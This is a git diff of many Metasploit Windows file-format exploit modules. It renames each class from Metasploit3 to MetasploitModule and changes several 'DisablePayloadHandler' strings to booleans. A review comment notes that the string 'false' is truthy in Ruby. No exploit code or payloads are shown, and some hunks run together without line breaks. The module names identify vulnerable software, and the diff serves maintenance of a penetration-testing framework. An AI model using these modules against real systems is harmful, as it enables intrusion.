index dd83c0b103..be882ba496 100644
--- a/modules/exploits/windows/fileformat/homm3_h3m.rb
+++ b/modules/exploits/windows/fileformat/homm3_h3m.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'zlib'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
index 468b74316a..2d4cb835fd 100644
--- a/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
+++ b/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
index b4ed4d9963..8ee1a341ad 100644
--- a/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
+++ b/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'rexml/document'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include REXML
diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb
index 9040c45a16..6905619ea8 100644
--- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb
+++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking # ASLR+DEP bypass
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb
index 0d4f157193..4d4902d9a8 100644
--- a/modules/exploits/windows/fileformat/icofx_bof.rb
+++ b/modules/exploits/windows/fileformat/icofx_bof.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb
index 6e76f51aff..302377f25f 100644
--- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb
+++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'seh',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
index 29df9fcdd0..335af1186d 100644
--- a/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
+++ b/modules/exploits/windows/fileformat/iftp_schedule_bof.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'rexml/document'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
index aebb884c39..4ef262a804 100644
--- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
+++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb
index 55699fcecf..846839bfb1 100644
--- a/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb
+++ b/modules/exploits/windows/fileformat/ispvm_xcf_ispxcf.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
index 4bc326cf3c..844674afc7 100644
--- a/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
+++ b/modules/exploits/windows/fileformat/kingview_kingmess_kvl.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/lattice_pac_bof.rb b/modules/exploits/windows/fileformat/lattice_pac_bof.rb
index 7af09b6327..5f3157ad99 100644
--- a/modules/exploits/windows/fileformat/lattice_pac_bof.rb
+++ b/modules/exploits/windows/fileformat/lattice_pac_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb
index 2c46655a13..6b492c5605 100644
--- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb
+++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
index aaaa68e5e4..969b09a005 100644
--- a/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
+++ b/modules/exploits/windows/fileformat/magix_musikmaker_16_mmm.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb
index a210a5ddad..82e78e7f6c 100644
--- a/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb
+++ b/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = LowRanking
 include Msf::Exploit::FILEFORMAT
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
index 41af41ef90..ef37f52edf 100644
--- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
+++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 {
 'EXITFUNC' => "none",
 #'InitialAutoRunScript' => 'migrate -f',
- 'DisablePayloadHandler' => 'false',
+ 'DisablePayloadHandler' => false,
 },
 'Platform' => 'win',
 'Targets' =>
diff --git a/modules/exploits/windows/fileformat/mediacoder_m3u.rb b/modules/exploits/windows/fileformat/mediacoder_m3u.rb
index 9a91b041e3..63947ef024 100644
--- a/modules/exploits/windows/fileformat/mediacoder_m3u.rb
+++ b/modules/exploits/windows/fileformat/mediacoder_m3u.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/mediajukebox.rb b/modules/exploits/windows/fileformat/mediajukebox.rb
index e6bf891a76..a3b275d5b2 100644
--- a/modules/exploits/windows/fileformat/mediajukebox.rb
+++ b/modules/exploits/windows/fileformat/mediajukebox.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
@@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'seh',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/microp_mppl.rb b/modules/exploits/windows/fileformat/microp_mppl.rb
index d2b6298122..c8fc52c28c 100644
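Review bot: In the `DefaultOptions` hash of mcafee_showreport_exec.rb the old value `'false'` was a non-empty string, which Ruby treats as truthy, so replacing it with the literal `false` may change behaviour rather than only tidy the type; the same applies to the `'false'` to `false` hunks in ms12_005.rb and ms13_071_theme.rb. Whether the framework normalised the string before reading the option is not visible in this diff, so it is worth confirming for these three modules that the payload handler is started as intended after the change. I would record the intent next to the entry, for example `'DisablePayloadHandler' => false, # boolean literal: the string 'false' is truthy in Ruby`. The enclosing method starts and ends outside the hunk.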
--- a/modules/exploits/windows/fileformat/microp_mppl.rb
+++ b/modules/exploits/windows/fileformat/microp_mppl.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
@@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'process',
- 'DisablePayloadHandler' => 'true',
+ 'DisablePayloadHandler' => true,
 },
 'Payload' =>
 {
diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb
index aaa749cc1f..1df34cf54e 100644
--- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb
+++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb
index 45c708b636..c6ce8282a9 100644
--- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb
+++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
index 06133dcc58..08d32e4615 100644
--- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
+++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb
index 95dff30b96..b5290628b1 100644
--- a/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb
+++ b/modules/exploits/windows/fileformat/mjm_quickplayer_s3m.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
index b1d56c8738..abca8b0b9a 100644
--- a/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
+++ b/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
diff --git a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb
index 5565d239b8..74a36749a5 100644
--- a/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb
+++ b/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb
index 563806e43f..2227ed7907 100644
--- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb
+++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
index 01127ad7e2..8e0efe9bee 100644
--- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
+++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'rex/ole'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
index 3e903cfb6a..ac9a801ea0 100644
--- a/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
+++ b/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'rex/ole'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb
index c38c4f6694..54346b5033 100644
--- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb
+++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
index 1a7ec7195a..cf2cc7d1fd 100644
--- a/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
+++ b/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
index a0786b7cfc..24283fda76 100644
--- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
+++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
@@ -7,7 +7,7 @@
 require 'msf/core'
 require 'rex/ole'
 require 'rex/ole/util'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
index 7e68750c0f..485b6ba9d9 100644
--- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
+++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms12_005.rb b/modules/exploits/windows/fileformat/ms12_005.rb
index be1f865651..6495b396d2 100644
--- a/modules/exploits/windows/fileformat/ms12_005.rb
+++ b/modules/exploits/windows/fileformat/ms12_005.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 require 'rex/zip'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::FILEFORMAT
@@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
 'DefaultOptions' =>
 {
 'EXITFUNC' => 'thread',
- 'DisablePayloadHandler' => 'false'
+ 'DisablePayloadHandler' => false
 },
 'Platform' => 'win',
 'Targets' =>
@@ -234,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote end =begin -mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c +mbp:win7_diff sinn3r$ diff patch/GetCurrentIcon.c vuln/GetCurrentIcon.c 1c1 < void *__thiscall CPackage::_GetCurrentIcon(void *this, int a2) --- diff --git a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb index 52709c9794..1548ef7a32 100644 --- a/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb +++ b/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb index e524c4a34b..f2d966c158 100644 --- a/modules/exploits/windows/fileformat/ms13_071_theme.rb +++ b/modules/exploits/windows/fileformat/ms13_071_theme.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT @@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/ms14_017_rtf.rb b/modules/exploits/windows/fileformat/ms14_017_rtf.rb index 178fd02774..aba2907db5 100644 --- a/modules/exploits/windows/fileformat/ms14_017_rtf.rb +++ b/modules/exploits/windows/fileformat/ms14_017_rtf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT 
diff --git a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
index 12a76d2f09..c68ecb9be7 100644
--- a/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
+++ b/modules/exploits/windows/fileformat/ms14_060_sandworm.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex/ole'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
index da08b259a5..70879a135d 100644
--- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
+++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex/ole'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb
index 2fae749a3d..34e74d6c31 100644
--- a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb
+++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb
@@ -6,7 +6,7 @@ require 'msf/core'
 require 'rex/ole'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb
index 66df942f10..48157af3b3 100644
--- a/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb
+++ b/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb index 9815d96b34..0c5fd421fe 100644 --- a/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb +++ b/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'DefaultOptions' => { - 'DisablePayloadHandler' => 'false' + 'DisablePayloadHandler' => false }, 'Platform' => 'win', 'Targets' => diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index f0b5395668..d6f086132f 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 3715060fab..772cf9a59f 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -25,7 +25,7 @@ end end -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb index 91ec7bd6be..33887dd6e5 100644 
--- a/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb
+++ b/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = LowRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/mymp3player_m3u.rb b/modules/exploits/windows/fileformat/mymp3player_m3u.rb
index 2de0c93213..e73e8a6b3a 100644
--- a/modules/exploits/windows/fileformat/mymp3player_m3u.rb
+++ b/modules/exploits/windows/fileformat/mymp3player_m3u.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/netop.rb b/modules/exploits/windows/fileformat/netop.rb
index a16320bc27..f89cbd3663 100644
--- a/modules/exploits/windows/fileformat/netop.rb
+++ b/modules/exploits/windows/fileformat/netop.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
index 076e614bb2..fa46dcbcae 100644
--- a/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
+++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/openoffice_ole.rb b/modules/exploits/windows/fileformat/openoffice_ole.rb
index ad26ef2fbd..85aaa1f5b8 100644
--- a/modules/exploits/windows/fileformat/openoffice_ole.rb
+++ b/modules/exploits/windows/fileformat/openoffice_ole.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
index 75ed8cc4d3..17350e5db9 100644
--- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
+++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb
index dd958d8620..ba23f01b14 100644
--- a/modules/exploits/windows/fileformat/orbital_viewer_orb.rb
+++ b/modules/exploits/windows/fileformat/orbital_viewer_orb.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/ovf_format_string.rb b/modules/exploits/windows/fileformat/ovf_format_string.rb
index 202fb38aba..d17be93da7 100644
--- a/modules/exploits/windows/fileformat/ovf_format_string.rb
+++ b/modules/exploits/windows/fileformat/ovf_format_string.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb
index fdd269942b..0c1416eb54 100644
--- a/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb
+++ b/modules/exploits/windows/fileformat/proshow_cellimage_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/proshow_load_bof.rb b/modules/exploits/windows/fileformat/proshow_load_bof.rb
index 7b5f803269..39a26a3059 100644
--- a/modules/exploits/windows/fileformat/proshow_load_bof.rb
+++ b/modules/exploits/windows/fileformat/proshow_load_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::FILEFORMAT
diff --git a/modules/exploits/windows/fileformat/publishit_pui.rb b/modules/exploits/windows/fileformat/publishit_pui.rb
index 6a260b10df..a77cd17b8e 100644
--- a/modules/exploits/windows/fileformat/publishit_pui.rb
